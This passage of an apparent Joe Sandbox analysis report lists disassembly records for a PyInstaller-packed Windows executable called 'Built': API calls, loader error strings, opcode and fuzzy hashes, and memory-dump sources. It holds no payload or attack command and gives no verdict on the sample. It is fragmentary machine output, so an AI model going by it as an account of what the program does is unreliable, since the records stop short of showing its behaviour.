_log10_special 8 API calls 19700 7ff65e29fb99 19699->19700 19716 7ff65e2a6194 19701->19716 19706 7ff65e29fbaa 19708 7ff65e29a900 _isindst 17 API calls 19706->19708 19710 7ff65e29fbbe 19708->19710 19713 7ff65e29faab 19713->19715 19741 7ff65e2a61d8 19713->19741 19715->19699 19717 7ff65e29fa6c 19716->19717 19718 7ff65e2a61a3 19716->19718 19723 7ff65e2a5598 19717->19723 19748 7ff65e2a02d8 EnterCriticalSection 19718->19748 19724 7ff65e2a55a1 19723->19724 19725 7ff65e29fa81 19723->19725 19726 7ff65e294f08 _get_daylight 11 API calls 19724->19726 19725->19706 19729 7ff65e2a55c8 19725->19729 19727 7ff65e2a55a6 19726->19727 19728 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 19727->19728 19728->19725 19730 7ff65e2a55d1 19729->19730 19731 7ff65e29fa92 19729->19731 19732 7ff65e294f08 _get_daylight 11 API calls 19730->19732 19731->19706 19735 7ff65e2a55f8 19731->19735 19733 7ff65e2a55d6 19732->19733 19734 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 19733->19734 19734->19731 19736 7ff65e2a5601 19735->19736 19737 7ff65e29faa3 19735->19737 19738 7ff65e294f08 _get_daylight 11 API calls 19736->19738 19737->19706 19737->19713 19739 7ff65e2a5606 19738->19739 19740 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 19739->19740 19740->19737 19749 7ff65e2a02d8 EnterCriticalSection 19741->19749 19981 7ff65e2aadfe 19982 7ff65e2aae17 19981->19982 19983 7ff65e2aae0d 19981->19983 19985 7ff65e2a0338 LeaveCriticalSection 19983->19985

Control-flow Graph

[Control-flow graph beginning at 7ff65e2889e0; legend: Executed, Not Executed]
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction ID: 43e4283f9dd56cf59b8c0e12dfa6f8cf4fc24f1b1fb76e800882b82e956e2f8b
• Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction Fuzzy Hash: 15D16032A08B8286EF149F34EA542A93761FFA4758F484235FA5EE2A9CDF7CD544C700

Control-flow Graph

[Control-flow graph beginning at 7ff65e281000; legend: Executed, Not Executed]
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                        • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                                        • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1617910340-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindFirstFileW.KERNELBASE(?,00007FF65E288919,00007FF65E283FA5), ref: 00007FF65E28842B
                                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?,00007FF65E288919,00007FF65E283FA5), ref: 00007FF65E2884AE
                                                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE(?,00007FF65E288919,00007FF65E283FA5), ref: 00007FF65E2884CD
                                                                                                                                                                                                                                                        • FindNextFileW.KERNELBASE(?,00007FF65E288919,00007FF65E283FA5), ref: 00007FF65E2884DB
                                                                                                                                                                                                                                                        • FindClose.KERNEL32(?,00007FF65E288919,00007FF65E283FA5), ref: 00007FF65E2884EC
                                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNELBASE(?,00007FF65E288919,00007FF65E283FA5), ref: 00007FF65E2884F5
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                                                                                                        • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1010374628-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E287F90: _fread_nolock.LIBCMT ref: 00007FF65E28803A
                                                                                                                                                                                                                                                        • _fread_nolock.LIBCMT ref: 00007FF65E281A1B
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF65E281B6A), ref: 00007FF65E28295E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                        • Opcode ID: 935fd2eea7ebb7e39a44c0ac0c5bb94dcb31adeab0dcd688edef334786e7c957
                                                                                                                                                                                                                                                        • Instruction ID: 2955832ee81c1f26e9cabaef6cd2b7726c41183c06a2190047b33413ec606662
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 935fd2eea7ebb7e39a44c0ac0c5bb94dcb31adeab0dcd688edef334786e7c957
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4819D71A0C78686EF209B25D3446B933A1AF68784F484431F98EE778EDE7CE585C741

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                        • Opcode ID: 85a2b5521d0669672b47b55b308223b2fdea38ff8534affe5992005950969590
                                                                                                                                                                                                                                                        • Instruction ID: 5648c308de843ea297d5dc15d8658f66d1b6e2ec3ccce06f07968131715519a4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85a2b5521d0669672b47b55b308223b2fdea38ff8534affe5992005950969590
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9518A61A0C74782EE10AB2297405A93391BFA4794F884536FE4CE7ADEEF7CE585C700

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(?,?,00000000,00007FF65E283CBB), ref: 00007FF65E288704
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00007FF65E283CBB), ref: 00007FF65E28870A
                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00007FF65E283CBB), ref: 00007FF65E28874C
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288830: GetEnvironmentVariableW.KERNEL32(00007FF65E28388E), ref: 00007FF65E288867
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF65E288889
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E298238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF65E298251
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282810: MessageBoxW.USER32 ref: 00007FF65E2828EA
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                        • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                        • Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                                        • Instruction ID: aaa7ee9585c6538495acb7c5d719b46d21ceb7598e973dad5a0f05597fc87f8f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7641BE12A1D74244FE18A765AB512B93291AFA47C8F8C1132FD0DE7BDEDE3CE4418300

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                        • Opcode ID: ab383ac4b995131bdd40696453c0f16ebeee9cffe796343d9728e2385cbc1d23
                                                                                                                                                                                                                                                        • Instruction ID: 361a7965764dfc78baa3e4ad746461db7474328e1aaed3a7052d0dcef977a902
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab383ac4b995131bdd40696453c0f16ebeee9cffe796343d9728e2385cbc1d23
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64517822A0C74285EE60AB12A7503BA7391ABA5B94F8C5135FD4DE7AD9EE3CE541C700

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF65E29F0AA,?,?,-00000018,00007FF65E29AD53,?,?,?,00007FF65E29AC4A,?,?,?,00007FF65E295F3E), ref: 00007FF65E29EE8C
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF65E29F0AA,?,?,-00000018,00007FF65E29AD53,?,?,?,00007FF65E29AC4A,?,?,?,00007FF65E295F3E), ref: 00007FF65E29EE98
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                        • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                        • Instruction ID: 190975a664ca8b879e9bce28240c6f52aefcaf1cdcc129ee6c34411143d0014c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5941BF31B19A1241EF158B269B0067532E5BF69BA0F8C6539FD5DE778CEE7CE4858200

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF65E283804), ref: 00007FF65E2836E1
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E283804), ref: 00007FF65E2836EB
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF65E283706,?,00007FF65E283804), ref: 00007FF65E282C9E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF65E283706,?,00007FF65E283804), ref: 00007FF65E282D63
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E282C50: MessageBoxW.USER32 ref: 00007FF65E282D99
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                        • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                        • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                        • Instruction ID: 1aed268da54980dbcc0a3475f997841fd5111a5b9c2872efeebdc468a0c0cdb9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9215161F1C74281FE209724EB153BA3291BFA8354F884136F69EE66DDEE6CE504C700

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                                        • Instruction ID: 3b3a9a25816a944e00a5cd0b7f45dcc2abe5ed9bd6c8b1f912fbded14ea25787
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32C10522A0CB8691EE609B1597402BD3B56FBA1BC0F5D2131FA4EE3799CE7CE4858714

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 995526605-0
                                                                                                                                                                                                                                                        • Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                                        • Instruction ID: 88d25a28f14b965947faa46e3455ce9b7f29d5039ded7c519c6a1774e2ce05b8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD215E31A0C74342EE148B55B78422AB7A1EFA57A0F980235FA6DD3AECDFBCD4458700

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288570: GetCurrentProcess.KERNEL32 ref: 00007FF65E288590
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288570: OpenProcessToken.ADVAPI32 ref: 00007FF65E2885A3
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288570: GetTokenInformation.KERNELBASE ref: 00007FF65E2885C8
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288570: GetLastError.KERNEL32 ref: 00007FF65E2885D2
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288570: GetTokenInformation.KERNELBASE ref: 00007FF65E288612
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF65E28862E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E288570: CloseHandle.KERNEL32 ref: 00007FF65E288646
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF65E283C55), ref: 00007FF65E28916C
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF65E283C55), ref: 00007FF65E289175
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
